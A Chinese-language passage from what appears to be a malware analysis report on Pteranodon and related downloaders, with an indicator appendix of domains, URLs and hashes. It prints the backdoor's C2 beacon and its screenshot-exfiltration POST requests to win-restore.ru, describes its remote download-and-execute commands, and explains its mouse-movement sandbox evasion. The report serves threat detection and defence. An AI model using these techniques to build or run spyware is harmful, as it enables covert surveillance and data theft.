然后,这个恶意软件会使用API函数URLDownloadToFileA()将有效载荷下载到磁盘并通过CreateProcess()执行它。最后,它在终止有效负载之前休眠60秒,最后以DLL的方式退出。
下载:MSO8734.obn / MpClients.dll
这个文件有着更高级版本的LocalSMS.dll下载。该文件不是直接将有效载荷下载到磁盘,而是从C2服务器请求一个URL的下载命令,这个下载命令包含要使用的实际有效载荷。因此,该文件会使用基于Winsock函数的基本网络来实现。这个DLL的所有功能都放在一个名为“bitDefender”的导出函数中。
“bitDefender”会创建一个套接字,通过gethostbyname()请求硬编码的C2服务器“win-restore.ru”的地址并与这个地址进行连接。此后,它还会收集C:\ drive的卷序列号,计算机名称和硬件配置文件GUID,接着,“bitDefender”将创建由后续send()函数调用使用的以下字符串:
“GET /css.php?id=WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236 HTTP/1.1
Host: win-restore.ru
Connection: close”
以上的响应将通过recv()存储到内存缓冲区中,并扫描字符串“urltoload = {”。顾名思义,接收的数据包含大括号内的有效内容的实际URL。 URL里的字符串,被再次用作API函数URLDownloadToFile()的输入。同样,相同的文件路径将用于存储磁盘上的有效负载并执行:
“C:\Users\<Username>\AppData\Local\Temp\frAQBc8Wsa”
Pteranodon:MSO1234.win / winrestore.dll
Pteranodon是一个后门,也可以捕获基于在磁盘上创建的配置文件的截图。此外,它将屏幕截图以不加密的形式上传到C2服务器。这个DLL的所有功能都放在一个名为“updater”的导出函数中。
首先,“updater”会检索本地用户的%APPDATA%文件夹以构建以下文件路径:
“C:\Users\<Username>\AppData\Roaming\Microsoft\desktop.ini”
然后,“updater”会检查文件是否已经存在,如果存在则继续执行。如果没有,“updater”会运行一个程序,检查是否是用鼠标移动来作为防沙箱技术。如果未检测到鼠标移动,则恶意软件则会无限循环这一步。
如果文件“desktop.ini”不存在,恶意软件会创建它并将以下信息写入其中:
“interval = {60} msfolder = {10} status = {0}”
此信息被用作配置数据并用来创建屏幕截图。还有可以从C2服务器检索的其他命令。以下命令可用:
exec = {{
此命令用于从大括号中的URL中下载和执行有效内容。它会在临时文件夹中创建一个随机文件路径,调用URLDownloadToFile()和CreateProcess()来运行有效负载。然后, 30秒后终止有效负载。
interval = {
此命令可以用于定义两个或多个屏幕截图创建之间的间隔时间(以秒为单位)。
msfolder = {
此命令可以定义要创建的屏幕截图的数量。
command = {/ command_c = {
此命令可以用于执行作为大括号之间的字符串存在的文件。在Windows工具cmd.exe和ShellExecute()的帮助下会有 “c”的各种变体。
status = {
该命令包含定义是否应该进行屏幕截图(“1”)或不是(“0”)的标志。
接下来,该命令会检查名为“asassin1dj”的互斥体,以验证系统是否已被感染,并创建它,如果不是这样:
接下来,它将创建以下文件夹(如果尚未显示):
“C:\Users\<Username>\AppData\Roaming\Microsoft\store”
接下来,根据“desktop.ini”中的配置数据,它在GDI32和gdiplus API函数的帮助下不断地在应用程序商店的文件夹中创建具有24位颜色深度的以及JPEG格式的屏幕截图,无需扩展。使用以下屏幕截图的文件命名方案:
<year> <month> <day> _ <hour> <minute> <seconds>
创建最后一个屏幕截图后,该命令将所有文件从“store”文件夹上传到C2服务器“win-restore[.]ru”。然后,该命令会删除文件夹中的所有文件,并开始为下一个截图的创建做准备。应该注意,。文件只是通过POST HTTP方法上传到脚本“vvd.php”,所以该命令没有检查什么文件被上传,为此,要使用以下HTTP请求,其中还包含来自受害者以及JPEG文件的数据:
POST /vvd.php HTTP/1.1
Accept: application/x-www-form-urlencoded
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=----------987978B0urd3Gf_$
Accept-Charset: utf-8
User-Agent: asasing
Host: win-restore.ru
Content-Length: <length>
Cache-Control: no-cache
------------987978B0urd3Gf_$
Content-Type: text/html
Content-Disposition: form-data; name="uuid"
WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236
------------987978B0urd3Gf_$
Content-Type: application/octet-stream
Content-Disposition: form-data; name="file0"; filename="<year><month><day>_<hour><minute><seconds>"
Content-Transfer-Encoding: 8bit
...JPEG file...
------------987978B0urd3Gf_$
Content-Type: application/octet-stream
Content-Disposition: form-data; name="file1"; filename="<year><month><day>_<hour><minute><seconds>"
Content-Transfer-Encoding: 8bit
...JPEG file...
...
------------987978B0urd3Gf_$
最后,该命令会检查是否有来自C2服务器的任何可用的新的命令信息,并根据这些信息更新“desktop.ini”文件。基于功能,编译时间和二进制差异,此恶意软件可能是更新版本的598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824。
wmphost.exe
此文件运行会无限循环,直到检测到鼠标移动,然后退出。此文件可用于规避不模拟鼠标移动的沙箱。要检测此文件是否在沙箱中运行,可用另一个文件扫描正在运行的进程列表,以查看是否存在“wmphost.exe”。
附录B:攻击指示器
域名:
admin-ru[.]ru adobe.update-service[.]net apploadapp.webhop[.]me brokbridge[.]com cat.gotdns[.]ch check-update[.]ru childrights.in[.]ua conhost.myftp[.]org docdownload.ddns[.]net downloads.email-attachments[.]ru downloads.file-attachments[.]ru dyndownload.serveirc[.]com e.muravej[.]ua email-attachments[.]ru file-attachments[.]ru freefiles.myftp[.]biz getmyfile.webhop[.]me googlefiles.serveftp[.]com grom56.ddns[.]net grom90.ddns[.]net hrome-update[.]ru hrome-updater[.]ru loaderskypetm.webhop[.]me loadsoulip.serveftp[.]com mail.file-attachments[.]ru mails.redirectme[.]net mars-ru[.]ru msrestore[.]ru oficialsite.webhop[.]me parkingdoma.webhop[.]me poligjong.webhop[.]me polistar.ddns[.]net proxy-spread[.]ru rms.admin-ru[.]ru samotsvety.com[.]ua skypeemocache[.]ru skypeupdate[.]ru spbpool.ddns[.]net spread-service[.]ru spread-ss[.]ru spread-updates[.]ru stor.tainfo.com[.]ua tortilla.sytes[.]net ukrnet.serveftp[.]com ukrway.galaktion[.]ru umachka[.]ua update-service[.]net updatesp.ddns[.]net updateviber.sytes[.]net webclidie.webhop[.]me win-restore[.]ru winloaded.sytes[.]net winupdateloader[.]ru www.file-attachments[.]ru www.win-restore[.]ru yfperoliz.webhop[.]me
URLs:
http://childrights.in[.]ua/public/manager/img/scrdll.ini http://prestigeclub.frantov[.]com.ua/press-center/press/chrome-xvnc-v5517.exe http://umachka[.]ua/screen/dk.tmp http://umachka[.]ua/screen/screen.tmp http://viberload.ddns[.]net/viber.nls
Hashes:
使用自定义开发工具的样品:
002aff376ec452ec35ae2930dfbb51bd40229c258611d19b86863c3b0d156705 08e69f21c3c60a4a9b78f580c3a55d4cfb74729705b5b7d01c1aecfd58fc49e6 0c47cf984afe87a14d0d4c94557864ed19b4cb52783e49ce96ebf9c2f8b52d27 0dc1010c3d3766158e2347d10fc78d9223c6e0e3a44aa8a76622aeff7d429ab9 0f745512940e0efd8f09c6d862571cba2b98fac9a9f7cf30dedcc08ace43a494 145dab86a43835bb37734c16756d6d64d8e5ac6b87c491c57385e27b564136b8 222e85e6d07bdc3a2141cdd582d3f2ed4b1ce5285731cc3f54e6202a13737f8d 2f2b26f2f7d164ea1f529edbc3cb8a1063b39121dad4dd19d8ee4bbbaf25ed37 3242183b1f0176a2e3cfb6bfef96b9d55c5a59ea9614dbde4ef89979336b5a5d 3773ddd462b01f9272656f3150f2c3de19e77199cf5fac1f44287d11593614f9 37c78ee7826d63bb9219de594ed6693f18da5db60e3cbc86795bd10b296f12ac 3e5b1116b2dfd99652a001968a05fc962974931a0596153ab0dea8e4a9982f89 400f53a89d08d47f608e1288d9873bf8d421fc7cd642c5e821674f38e07a1501 598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824 5b22ace98b57ed19d815c49983c96a3c6ff0b2701e8167d4422c6990982abcf9 5ec8b7ca4461720bd69fb49b3f6cae637d8ac3bbd675da938bc5a84e9b73b395 840b3d4cc95dbf311f792a9f50137056deb66bfdbb55eb9f54ff381a0df65656 90ba0f95896736b799f8651ef0600d4fa85c6c3e056e54eab5bb216327912edd 97ebd7bfad63b36b4572132f6ece359ff9991f269048c0b145411699bfe3dc34 9a1fd88970da3809f45cef00360d1e54ea11a70035c277c130404a67371e142d 9cb64d3242d2b591bd2ff13b1aadef2e6b4bf9147f4a0926613b7c9343feb312 a46508ec9e48c256261b2d1914532a36ac7da093253320135d77581051751b75 a7e27ff0695a4bdf58c584f48664acd3a385ccebf3a542fdd6d7383f414aa83a a804beddd22bb76ea207a9607ed5c888f2f640cbd9ed9a32942fcd0b8a25c4d5 ae5ab2e887a9b46ea7819b7ebbb8163028e66882c97e75b0698dc3a69a69d7da b2fb7d2977f42698ea92d1576fdd4da7ad7bb34f52a63e4066f158a4b1ffb875 b9434e5a14159c49af2d1a5a11d570f195797d6b17aa560c3dde4a5b3486bf2a be2be662cc821a924d5641422dd1116e99188c6923da092ca3f0f8f862bd2d2d d01df47b6187631c9a93bdad1298439ab1a1c5529b3319f3614b6ec2455e5726 d1ba365e93ff0a4f3a2cb1d657568e583e3fbd7dbb1c2c52e28f16480324e3bb ddfc6bb4819527b2424d6e1a84f04b67adad79401e39efbffba5b7d727e732f0 df434f54802a6814628f30cae335c302bae7085c4e8314d71a41a47d9c410c39 e24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4 f2296bcb6be68dfb330baec2091fb11a42a51928ba057164213580e6ff0e1126
使用捆绑商品工具的样品